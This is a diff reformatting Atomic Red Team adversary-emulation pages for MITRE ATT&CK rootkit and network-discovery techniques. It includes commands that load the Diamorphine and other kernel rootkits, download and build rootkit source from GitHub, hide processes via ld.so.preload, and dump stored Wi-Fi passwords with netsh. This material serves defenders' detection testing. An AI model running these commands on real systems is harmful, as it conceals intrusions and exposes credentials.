@@ -166,101 +125,54 @@ $handle | get-member -erroraction silentlycontinue | out-file #{output_file} -ap
 $position += 1} catch{}}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 remove-item #{output_file} -force -erroraction silentlycontinue
 remove-item $env:temp\clsids.txt -force -erroraction silentlycontinue
 ```
+### Atomic Test #4: Reg query for AlwaysInstallElevated status

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Reg query for AlwaysInstallElevated status
 The reg query commands allows to check the status of the AlwaysInstallElevated registry key for both the user and the machine. If both queries return a value of 0x1, then AlwaysInstallElevated is enabled for both user and machine thus allowing a regular user to install a Microsoft Windows Installer package with system level privileges. This can be abused by an attacker to escalate privileges in the host to SYSTEM level.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `6fb4c4c5-f949-4fd2-8af5-ddbc61595223`

-**auto_generated_guid:** 6fb4c4c5-f949-4fd2-8af5-ddbc61595223
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 ```

+### Atomic Test #5: Check Software Inventory Logging (SIL) status via Registry

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Check Software Inventory Logging (SIL) status via Registry
 Microsoft's Software Inventory Logging (SIL) collects information about software installed per host basis. Adversary can use such logs to passively 
 check for existence of software of interest to them. Status of SIL can be checked via registry.
 [Reference](https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `5c784969-1d43-4ac7-8c3d-ed6d025ed10d`

-**auto_generated_guid:** 5c784969-1d43-4ac7-8c3d-ed6d025ed10d
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64
 ```

+### Atomic Test #6: Inspect SystemStartOptions Value in Registry

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Inspect SystemStartOptions Value in Registry
 The objective of this test is to query the SystemStartOptions key under HKLM\SYSTEM\CurrentControlSet\Control in the Windows registry. This action could be used to uncover specific details about how the system is configured to start, potentially aiding in understanding boot parameters or identifying security-related settings. key is.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `96257079-cdc1-4aba-8705-3146e94b6dce`

-**auto_generated_guid:** 96257079-cdc1-4aba-8705-3146e94b6dce
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 reg.exe query HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions
 ```

-
-
-
-
-
-<br/>
@@ -1,70 +1,63 @@
 # T1014 - Rootkit
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1014)
-<blockquote>

-Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) 
+## Description from ATT&CK

-Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
+> Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
+> 
+> Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
+> 
+> Rootkits that reside or modify boot sectors are known as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically target the boot process of the operating system.

-Rootkits that reside or modify boot sectors are known as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically target the boot process of the operating system.
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1014)

 ## Atomic Tests

- [Atomic Test #1 - Loadable Kernel Module based Rootkit](#atomic-test-1---loadable-kernel-module-based-rootkit)
+- [Atomic Test #1: Loadable Kernel Module based Rootkit](#atomic-test-1-loadable-kernel-module-based-rootkit)
+- [Atomic Test #2: Loadable Kernel Module based Rootkit](#atomic-test-2-loadable-kernel-module-based-rootkit)
+- [Atomic Test #3: dynamic-linker based rootkit (libprocesshider)](#atomic-test-3-dynamic-linker-based-rootkit-libprocesshider)
+- [Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine)](#atomic-test-4-loadable-kernel-module-based-rootkit-diamorphine)

- [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)
+### Atomic Test #1: Loadable Kernel Module based Rootkit

- [Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)](#atomic-test-3---dynamic-linker-based-rootkit-libprocesshider)
-
- [Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)](#atomic-test-4---loadable-kernel-module-based-rootkit-diamorphine)
-
-
-<br/>
-
-## Atomic Test #1 - Loadable Kernel Module based Rootkit
 Loadable Kernel Module based Rootkit

 **Supported Platforms:** Linux

+**auto_generated_guid:** `dfb50072-e45a-4c75-a17e-a484809c8553`

-**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
 | rootkit_path | Path To rootkit | string | PathToAtomicsFolder/T1014/bin|
 | rootkit_name | Module name | string | T1014|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sudo insmod #{rootkit_path}/#{rootkit_name}.ko
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 sudo rmmod #{rootkit_name}
 sudo rm -rf #{rootkit_path}
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 sudo apt install make
 sudo apt install gcc
@@ -76,54 +69,47 @@ mv /tmp/T1014/#{rootkit_name}.ko #{rootkit_path}/#{rootkit_name}.ko
 rm -rf /tmp/T1014
 ```

+### Atomic Test #2: Loadable Kernel Module based Rootkit

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Loadable Kernel Module based Rootkit
 Loadable Kernel Module based Rootkit

 **Supported Platforms:** Linux

+**auto_generated_guid:** `75483ef8-f10f-444a-bf02-62eb0e48db6f`

-**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
 | rootkit_name | Module name | string | T1014|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sudo modprobe #{rootkit_name}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 sudo modprobe -r #{rootkit_name}
 sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
 sudo depmod -a
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: The kernel module must exist on disk at specified location (#{rootkit_source_path}/#{rootkit_name}.ko)
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 sudo apt install make
 sudo apt install gcc
@@ -135,55 +121,48 @@ sudo cp /tmp/T1014/#{rootkit_name}.ko /lib/modules/$(uname -r)/
 sudo depmod -a
 ```

+### Atomic Test #3: dynamic-linker based rootkit (libprocesshider)

-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)
 Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).

 **Supported Platforms:** Linux

+**auto_generated_guid:** `1338bf0c-fd0c-48c0-9e65-329f18e2c0d3`

-**auto_generated_guid:** 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | repo | Url of the github repo zip | string | https://github.com/gianlucaborello/libprocesshider/|
 | rev | Revision of the github repo zip | string | 25e0587d6bf2137f8792dc83242b6b0e5a72b415|
 | library_path | Full path of the library to add to ld.so.preload | string | /usr/local/lib/libprocesshider.so|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 echo #{library_path} | tee -a /etc/ld.so.preload
 /usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 sed -i "\:^#{library_path}:d" /etc/ld.so.preload
 rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: The preload library must exist on disk at specified location (#{library_path})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 mkdir -p /tmp/atomic && cd /tmp/atomic
 curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
@@ -192,34 +171,23 @@ cp libprocesshider.so #{library_path}
 cp /usr/bin/ping /usr/local/bin/evil_script.py
 ```

+### Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine)

-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)
 Loads Diamorphine kernel module, which hides itself and a processes.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `0b996469-48c6-46e2-8155-a17f8b6c2247`

-**auto_generated_guid:** 0b996469-48c6-46e2-8155-a17f8b6c2247
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | repo | Url of the diamorphine github repo | string | https://github.com/m0nad/Diamorphine/|
 | rev | Revision of the github repo zip | string | 898810523aa2033f582a4a5903ffe453334044f9|
 | rootkit_name | Module name | string | diamorphine|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sudo modprobe #{rootkit_name}
@@ -229,7 +197,8 @@ kill -31 $TARGETPID
 ps $TARGETPID || echo "process ${TARGETPID} hidden"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 kill -63 1
 sudo modprobe -r #{rootkit_name}
@@ -237,15 +206,18 @@ sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
 sudo depmod -a
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: The kernel module must exist on disk at specified location (#{rootkit_name}.ko)
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 mkdir -p /tmp/atomic && cd /tmp/atomic
 curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
@@ -254,7 +226,3 @@ sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
 sudo depmod -a
 ```

-
-
-
-<br/>
@@ -1,188 +1,118 @@
 # T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/001)
-<blockquote>

-Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites, or performing initial speed testing to confirm bandwidth.
+## Description from ATT&CK

-Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.
+> Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites, or performing initial speed testing to confirm bandwidth.
+> 
+> Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1016/001)

 ## Atomic Tests

- [Atomic Test #1 - Check internet connection using ping Windows](#atomic-test-1---check-internet-connection-using-ping-windows)
+- [Atomic Test #1: Check internet connection using ping Windows](#atomic-test-1-check-internet-connection-using-ping-windows)
+- [Atomic Test #2: Check internet connection using ping freebsd, linux or macos](#atomic-test-2-check-internet-connection-using-ping-freebsd-linux-or-macos)
+- [Atomic Test #3: Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)](#atomic-test-3-check-internet-connection-using-test-netconnection-in-powershell-icmp-ping)
+- [Atomic Test #4: Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)](#atomic-test-4-check-internet-connection-using-test-netconnection-in-powershell-tcp-http)
+- [Atomic Test #5: Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)](#atomic-test-5-check-internet-connection-using-test-netconnection-in-powershell-tcp-smb)

- [Atomic Test #2 - Check internet connection using ping freebsd, linux or macos](#atomic-test-2---check-internet-connection-using-ping-freebsd-linux-or-macos)
+### Atomic Test #1: Check internet connection using ping Windows

- [Atomic Test #3 - Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)](#atomic-test-3---check-internet-connection-using-test-netconnection-in-powershell-icmp-ping)
-
- [Atomic Test #4 - Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)](#atomic-test-4---check-internet-connection-using-test-netconnection-in-powershell-tcp-http)
-
- [Atomic Test #5 - Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)](#atomic-test-5---check-internet-connection-using-test-netconnection-in-powershell-tcp-smb)
-
-
-<br/>
-
-## Atomic Test #1 - Check internet connection using ping Windows
 Check internet connection using ping on Windows. The default target of the ping is 8.8.8.8 (Google Public DNS).

 **Supported Platforms:** Windows

+**auto_generated_guid:** `e184b6bd-fb28-48aa-9a59-13012e33d7dc`

-**auto_generated_guid:** e184b6bd-fb28-48aa-9a59-13012e33d7dc
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ping_target | target of the ping | url | 8.8.8.8|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 ping -n 4 #{ping_target}
 ```

+### Atomic Test #2: Check internet connection using ping freebsd, linux or macos

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Check internet connection using ping freebsd, linux or macos
 Check internet connection using ping on Linux, MACOS. The default target of the ping is 8.8.8.8 (Google Public DNS).

 **Supported Platforms:** macOS, Linux

+**auto_generated_guid:** `be8f4019-d8b6-434c-a814-53123cdcc11e`

-**auto_generated_guid:** be8f4019-d8b6-434c-a814-53123cdcc11e
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ping_target | target of the ping | url | 8.8.8.8|

-
-#### Attack Commands: Run with `bash`! 
-
+#### Attack Commands: Run with `bash`!

 ```bash
 ping -c 4 #{ping_target}
 ```

+### Atomic Test #3: Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
 Check internet connection using PowerShell's Test-NetConnection cmdlet and the ICMP/Ping protocol. The default target is 8.8.8.8 (Google Public DNS).

 **Supported Platforms:** Windows

+**auto_generated_guid:** `f8160cde-4e16-4c8b-8450-6042d5363eb0`

-**auto_generated_guid:** f8160cde-4e16-4c8b-8450-6042d5363eb0
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target | target of the request | string | 8.8.8.8|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 Test-NetConnection -ComputerName #{target}
 ```

+### Atomic Test #4: Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)
 Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound HTTP (Port 80) access. The default target is www.google.com.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `7c35779d-42ec-42ab-a283-6255b28e9d68`

-**auto_generated_guid:** 7c35779d-42ec-42ab-a283-6255b28e9d68
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target | target of the request | string | www.google.com|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 Test-NetConnection -CommonTCPPort HTTP -ComputerName #{target}
 ```

+### Atomic Test #5: Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)
 Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound SMB (Port 445) access. The default target is 8.8.8.8.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `d9c32b3b-7916-45ad-aca5-6c902da80319`

-**auto_generated_guid:** d9c32b3b-7916-45ad-aca5-6c902da80319
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target | target of the request | string | 8.8.8.8|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 Test-NetConnection -CommonTCPPort SMB -ComputerName #{target}
 ```

-
-
-
-
-
-<br/>
@@ -1,46 +1,30 @@
 # T1016.002 - System Network Configuration Discovery: Wi-Fi Discovery
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/002)
-<blockquote>

-Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
+## Description from ATT&CK

-Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi network’s corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
+> Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
+> 
+> Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi network’s corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
+> 
+> On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)

-On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
-
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1016/002)

 ## Atomic Tests

- [Atomic Test #1 - Enumerate Stored Wi-Fi Profiles And Passwords via netsh](#atomic-test-1---enumerate-stored-wi-fi-profiles-and-passwords-via-netsh)
+- [Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh](#atomic-test-1-enumerate-stored-wi-fi-profiles-and-passwords-via-netsh)

+### Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh

-<br/>
-
-## Atomic Test #1 - Enumerate Stored Wi-Fi Profiles And Passwords via netsh
 Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).

 **Supported Platforms:** Windows

+**auto_generated_guid:** `53cf1903-0fa7-4177-ab14-f358ae809eec`

-**auto_generated_guid:** 53cf1903-0fa7-4177-ab14-f358ae809eec
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 netsh wlan show profile * key=clear
 ```

-
-
-
-
-
-<br/>
@@ -1,55 +1,38 @@
 # T1016 - System Network Configuration Discovery
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016)
-<blockquote>

-Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
+## Description from ATT&CK

-Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)
+> Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
+> 
+> Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)
+> 
+> Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

-Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. 
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1016)

 ## Atomic Tests

- [Atomic Test #1 - System Network Configuration Discovery on Windows](#atomic-test-1---system-network-configuration-discovery-on-windows)
+- [Atomic Test #1: System Network Configuration Discovery on Windows](#atomic-test-1-system-network-configuration-discovery-on-windows)
+- [Atomic Test #2: List Windows Firewall Rules](#atomic-test-2-list-windows-firewall-rules)
+- [Atomic Test #3: System Network Configuration Discovery](#atomic-test-3-system-network-configuration-discovery)
+- [Atomic Test #4: System Network Configuration Discovery (TrickBot Style)](#atomic-test-4-system-network-configuration-discovery-trickbot-style)
+- [Atomic Test #5: List Open Egress Ports](#atomic-test-5-list-open-egress-ports)
+- [Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects](#atomic-test-6-adfind---enumerate-active-directory-subnet-objects)
+- [Atomic Test #7: Qakbot Recon](#atomic-test-7-qakbot-recon)
+- [Atomic Test #8: List macOS Firewall Rules](#atomic-test-8-list-macos-firewall-rules)
+- [Atomic Test #9: DNS Server Discovery Using nslookup](#atomic-test-9-dns-server-discovery-using-nslookup)

- [Atomic Test #2 - List Windows Firewall Rules](#atomic-test-2---list-windows-firewall-rules)
+### Atomic Test #1: System Network Configuration Discovery on Windows

- [Atomic Test #3 - System Network Configuration Discovery](#atomic-test-3---system-network-configuration-discovery)
-
- [Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)](#atomic-test-4---system-network-configuration-discovery-trickbot-style)
-
- [Atomic Test #5 - List Open Egress Ports](#atomic-test-5---list-open-egress-ports)
-
- [Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects](#atomic-test-6---adfind---enumerate-active-directory-subnet-objects)
-
- [Atomic Test #7 - Qakbot Recon](#atomic-test-7---qakbot-recon)
-
- [Atomic Test #8 - List macOS Firewall Rules](#atomic-test-8---list-macos-firewall-rules)
-
- [Atomic Test #9 - DNS Server Discovery Using nslookup](#atomic-test-9---dns-server-discovery-using-nslookup)
-
-
-<br/>
-
-## Atomic Test #1 - System Network Configuration Discovery on Windows
 Identify network configuration information

 Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `970ab6a1-0157-4f3f-9a73-ec4166754b23`

-**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 ipconfig /all
@@ -59,60 +42,32 @@ nbtstat -n
 net config
 ```

+### Atomic Test #2: List Windows Firewall Rules

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - List Windows Firewall Rules
 Enumerates Windows Firewall Rules using netsh.

 Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `038263cb-00f4-4b0a-98ae-0696c67e1752`

-**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 netsh advfirewall firewall show rule name=all
 ```

+### Atomic Test #3: System Network Configuration Discovery

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - System Network Configuration Discovery
 Identify network configuration information.
 Upon successful execution, sh will spawn multiple commands and output will be via stdout.

 **Supported Platforms:** macOS, Linux

+**auto_generated_guid:** `c141bbdb-7fca-4254-9fd6-f47e79447e17`

-**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
@@ -123,42 +78,33 @@ if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:l
 ```


